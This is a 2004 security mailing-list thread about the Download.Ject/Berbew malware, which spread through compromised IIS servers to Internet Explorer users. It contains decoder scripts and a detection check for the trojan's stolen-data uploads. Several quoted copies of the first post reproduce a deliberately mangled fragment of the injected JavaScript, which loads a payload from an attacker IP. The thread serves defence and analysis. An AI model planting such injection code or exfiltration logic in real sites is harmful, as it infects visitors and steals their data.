Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-27 Thread Matt Power
From: insecure [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Date: Fri, 25 Jun 2004 12:36:41 -0500
...
Berbew/Webber/Padodor Trojan, according to Lurhq.

http://www.lurhq.com/berbew.html

This web page mentions:

  content:id=crutop|26|vvpupkin0=

The upload is in an encoded format that consists of records that
specify a machine name, a user name, and a web site that includes an
HTML form. For example, if the machine name were BINDVIEW-LAB-17, the
user name were labuser, and the form were on http://www.example.com/,
then the uploaded data would be sent via HTTP POST, and consist of:

id=crutop&vvpupkin0=asadaeafbeabanbzceclcbbncecabmdocjbwbzdocmcs&vvpupkin1=asadaeafbeabanbdaqataeacauad&vvpupkin2=asadaeafbeabanazafafabcxdqdqagagagdrauajaqbcabbdaudrasbebcdqddcdckbjcibucn

The POST data is sent to one of the web sites specified in

  http://tms.symantec.com/documents/040624-Alert-CompromisedIISServerReports.pdf

The data can be decoded with the following perl script:

#!/usr/bin/perl
# Reads one captured POST body from STDIN, splits it on '&', and decodes
# every vvpupkinN field: each pair of letters a-z is one byte written in
# base 26, which is then XORed with 113.
use bytes;
$line = <STDIN>;
chomp($line);
@r = split /&/, $line;
for ($i = 0; $i <= $#r; ++$i)
{
    next if ($r[$i] !~ /^vvpupkin/);
    @p = split /=/, $r[$i];
    for ($j = 0; $j < length($p[1]) / 2; ++$j)
    {
        $c1 = substr($p[1], 2 * $j, 1);
        $c2 = substr($p[1], (2 * $j) + 1, 1);
        $o1 = ord($c1) - ord("a");
        $o2 = ord($c2) - ord("a");
        print chr(((26 * $o1) + $o2) ^ 113);
    }
    print "\n";
}


The output of the perl script is:

crutop|BINDVIEW-LAB-17
crutop|labuser
crutop|http://www.example.com/ FORM_0


Matt Power
BindView Corporation, RAZOR Team
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
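The same decoding in Python, as an added example that is not part of Matt's post: it parses a captured upload body, decodes the vvpupkinN fields with the base-26-pair / XOR 113 scheme described above, and adds a defender-side check that mirrors the quoted IDS content match. SAMPLE_POST is the body quoted in the post, with the '&' separators (the |26| byte in the signature) restored; the function names are this example's own.

```python
from __future__ import annotations
import re

XOR_KEY = 113  # the constant the Perl decoder in the post XORs each byte with


def decode_field(enc: str, key: int = XOR_KEY) -> str:
    """Decode one vvpupkinN value: two letters a-z per byte, base 26, then XOR."""
    if len(enc) % 2 or not re.fullmatch(r"[a-z]*", enc):
        raise ValueError("field must be an even-length run of lowercase a-z")
    out = []
    for hi, lo in zip(enc[0::2], enc[1::2]):
        out.append(chr((26 * (ord(hi) - 97) + (ord(lo) - 97)) ^ key))
    return "".join(out)


def decode_upload(body: str) -> dict[str, str]:
    """Split a captured POST body on '&' and decode every vvpupkin* field."""
    fields: dict[str, str] = {}
    for part in body.strip().split("&"):
        name, _, value = part.partition("=")
        fields[name] = decode_field(value) if name.startswith("vvpupkin") else value
    return fields


def records(body: str) -> list[str]:
    """Decoded vvpupkin values in numeric order (machine, user, form site, ...)."""
    fields = decode_upload(body)
    keys = sorted((k for k in fields if k.startswith("vvpupkin")),
                  key=lambda k: int(k[len("vvpupkin"):]))
    return [fields[k] for k in keys]


def looks_like_berbew_upload(body: str) -> bool:
    """Detection check: the quoted IDS prefix plus well-formed encoded fields."""
    if not body.startswith("id=crutop&vvpupkin0="):
        return False
    parts = body.strip().split("&")[1:]
    return all(re.fullmatch(r"vvpupkin\d+=(?:[a-z]{2})*", p) for p in parts)


# Sample body quoted in the post (BINDVIEW-LAB-17 / labuser / www.example.com);
# the '&' separators are restored from the |26| byte in the IDS content match.
SAMPLE_POST = (
    "id=crutop"
    "&vvpupkin0=asadaeafbeabanbzceclcbbncecabmdocjbwbzdocmcs"
    "&vvpupkin1=asadaeafbeabanbdaqataeacauad"
    "&vvpupkin2=asadaeafbeabanazafafabcxdqdqagagagdrauajaqbcabbdaudrasbebcdqddcdckbjcibucn"
)

if __name__ == "__main__":
    for rec in records(SAMPLE_POST):
        print(rec)
```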


Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread Gary Flynn
Just a reminder. This isn't the first time this has
happened:
http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675
--
Gary Flynn
Security Engineer
James Madison University


RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread joe
For the IIS side

http://www.microsoft.com/security/incident/download_ject.mspx
 


Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.

Important  Customers who have deployed Windows XP Service Pack 2 RC2 are not
at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to attempt
to infect users of Internet Explorer with malicious code.






-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
clients

Hi all,

This is a heads up.

A new malware has been reported from several sources so it appears to be
fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers were compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:

script language=Javascript

function InjectedDuringRedirection(){
  showModalDialog('md.htm', window, dialog
Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
:1\;).location=  java script:'SCRIPT  SRC =\\' http://
217.107.218.147/shellxxx.js\\' \ /script';

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in the
following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop msits.exe (51.712 bytes), a
trojan-downloader, and run it.

Consider denying access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk



Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread [EMAIL PROTECTED]
With the current (in)security of most (if not all) ISPs
that provide ASP.Net or ASP Classic shared hosting
services, all the attackers need to do is to get a
hosting account on a shared hosting server (trivial)
and infect these websites from the inside.

I haven't heard of any new IIS exploit (which doesn't
mean that they don't exist), but compromising the IIS
box from the inside (as seen in the Interland story) is
probably how this happened.

BTW, do you know which ISP hosts the 'compromised'
websites?

Dinis Cruz
.Net Security Consultant
DDPlus

On Fri, 25 Jun 2004 09:20:34 -0400, Gary Flynn wrote

 
> Just a reminder. This isn't the first time this has
> happened:
>
> http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675
>
> --
> Gary Flynn
> Security Engineer
> James Madison University




Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread bills.bitch

This is impossible. Microsoft products are inherently secure. We have
a patched IIS as stated by the alert, an alpha security patch for the
operating system and open holes in the browser. No doubt this is a vicious
anti-Microsoft attempt to discredit their security commitments by people
who are jealous of Bill Gates' wealth. That or maybe by disgruntled individuals
who failed to earn their MVP status.

> For the IIS side
>
> http://www.microsoft.com/security/incident/download_ject.mspx
>
> Microsoft teams are investigating a report of a security issue affecting
> customers using Microsoft Internet Information Services 5.0 (IIS) and
> Microsoft Internet Explorer, components of Windows.
>
> Important  Customers who have deployed Windows XP Service Pack 2 RC2 are not
> at risk.
>
> Reports indicate that Web servers running Windows 2000 Server and IIS that
> have not applied update 835732, which was addressed by Microsoft Security
> Bulletin MS04-011, are possibly being compromised and being used to attempt
> to infect users of Internet Explorer with malicious code.
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse
> Sent: Thursday, June 24, 2004 7:22 PM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
> clients
>
> Hi all,
>
> This is a heads up.
>
> A new malware has been reported from several sources so it appears to be
> fairly widespread already.
>
> The malware spreads from infected IIS servers to clients that visit the
> webpage of the infected server. How the IIS servers were compromised in the
> first place is unfortunately still unknown (any info on that would be
> appreciated).
>
> The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
> so by running a javascript that apparently gets appended to several files in
> the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
> 217.107.218.147/xxx.html that contains the following code:
>
> script language=Javascript
>
> function InjectedDuringRedirection(){
>   showModalDialog('md.htm', window, dialog
> Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
> :1\;).location=  java script:'SCRIPT  SRC =\\' http://
> 217.107.218.147/shellxxx.js\\' \ /script';
>
> [snip - you get the picture, right?]
>
> I had to put in some spaces to get past trivial content filtering.
>
> From that point it will try to run the malware in a 1x1 dialogbox in the
> following order:
>
> shellscript_loadxxx.js
> shellxxx.js
>
> The shellxxx.js will try to drop msits.exe (51.712 bytes), a
> trojan-downloader, and run it.
>
> Consider denying access to http://217.107.218.147 in your firewall. This
> will at least prevent client PCs from getting infected.
>
> Further information can be found in the daily log from SANS:
> http://isc.sans.org/
>
> Regards
> Peter Kruse
> http://www.csis.dk



Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-25 Thread insecure
Berbew/Webber/Padodor Trojan, according to Lurhq.
http://www.lurhq.com/berbew.html
joe wrote:
> For the IIS side
>
> http://www.microsoft.com/security/incident/download_ject.mspx
>
> Microsoft teams are investigating a report of a security issue affecting
> customers using Microsoft Internet Information Services 5.0 (IIS) and
> Microsoft Internet Explorer, components of Windows.
>
> Important  Customers who have deployed Windows XP Service Pack 2 RC2 are not
> at risk.
>
> Reports indicate that Web servers running Windows 2000 Server and IIS that
> have not applied update 835732, which was addressed by Microsoft Security
> Bulletin MS04-011, are possibly being compromised and being used to attempt
> to infect users of Internet Explorer with malicious code.
>
> -Original Message-
> From: [EMAIL PROTECTED]
> [mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse
> Sent: Thursday, June 24, 2004 7:22 PM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
> clients
>
> Hi all,
>
> This is a heads up.
>
> A new malware has been reported from several sources so it appears to be
> fairly widespread already.
>
> The malware spreads from infected IIS servers to clients that visit the
> webpage of the infected server. How the IIS servers were compromised in the
> first place is unfortunately still unknown (any info on that would be
> appreciated).
>
> The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
> so by running a javascript that apparently gets appended to several files in
> the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
> 217.107.218.147/xxx.html that contains the following code:
>
> script language=Javascript
>
> function InjectedDuringRedirection(){
>   showModalDialog('md.htm', window, dialog
> Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
> :1\;).location=  java script:'SCRIPT  SRC =\\' http://
> 217.107.218.147/shellxxx.js\\' \ /script';
>
> [snip - you get the picture, right?]
>
> I had to put in some spaces to get past trivial content filtering.
>
> From that point it will try to run the malware in a 1x1 dialogbox in the
> following order:
>
> shellscript_loadxxx.js
> shellxxx.js
>
> The shellxxx.js will try to drop msits.exe (51.712 bytes), a
> trojan-downloader, and run it.
>
> Consider denying access to http://217.107.218.147 in your firewall. This
> will at least prevent client PCs from getting infected.
>
> Further information can be found in the daily log from SANS:
> http://isc.sans.org/
>
> Regards
> Peter Kruse
> http://www.csis.dk


Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

2004-06-24 Thread Nick FitzGerald
Peter Kruse [EMAIL PROTECTED] wrote:

> This is a heads up.

Or...

PANIC, PANIC, PANIC...

> A new malware has been reported from several sources so it appears to be
> fairly widespread already.
>
> The malware spreads from infected IIS servers to clients that visit the
> webpage of the infected server. How the IIS servers were compromised in the
> first place is unfortunately still unknown (any info on that would be
> appreciated).

There is _no_ evidence (yet) that this is spreading from infected IIS 
servers.  _Some_ IIS admins whose servers are involved don't know how 
the content got on their servers, but that is far from grounds for 
claiming said servers are, or even may be, infected.  Of course they 
might be, but history suggests that slack admin'ing is at least as 
likely as an explanation...

> The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
> so by running a javascript that apparently gets appended to several files in
> the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
> 217.107.218.147/xxx.html that contains the following code:
>
> script language=Javascript
>
> function InjectedDuringRedirection(){
>   showModalDialog('md.htm', window, dialog
> Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
> :1\;).location=  java script:'SCRIPT  SRC =\\' http://
> 217.107.218.147/shellxxx.js\\' \ /script';
>
> [snip - you get the picture, right?]
>
> I had to put in some spaces to get past trivial content filtering.
>
> From that point it will try to run the malware in a 1x1 dialogbox in the
> following order:
>
> shellscript_loadxxx.js
> shellxxx.js
>
> The shellxxx.js will try to drop msits.exe (51.712 bytes), a
> trojan-downloader, and run it.

It does this via the now very old ms-its: protocol zone-handling bug... 
Apparently someone needs to decode a few more levels of JavaScript, etc 
to work this all out...

> Consider denying access to http://217.107.218.147 in your firewall. This
> will at least prevent client PCs from getting infected.

Thanks Peter, but what about all the _other_ servers out there also 
hosting more or less exactly the same files?  Are you going to provide 
a list of all those IPs too?

I've seen several (probably 5 or 6 others) in the last week or so with 
all the same files or just one difference (ignoring the trivial script 
differences necessitated by referring to different hosts) -- the .EXE 
that is eventually downloaded is a different variant.

> Further information can be found in the daily log from SANS:
> http://isc.sans.org/

Woohoo -- SANS incident handlers have reported one incident of this 
they know about so the sky must be falling!

Next...


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
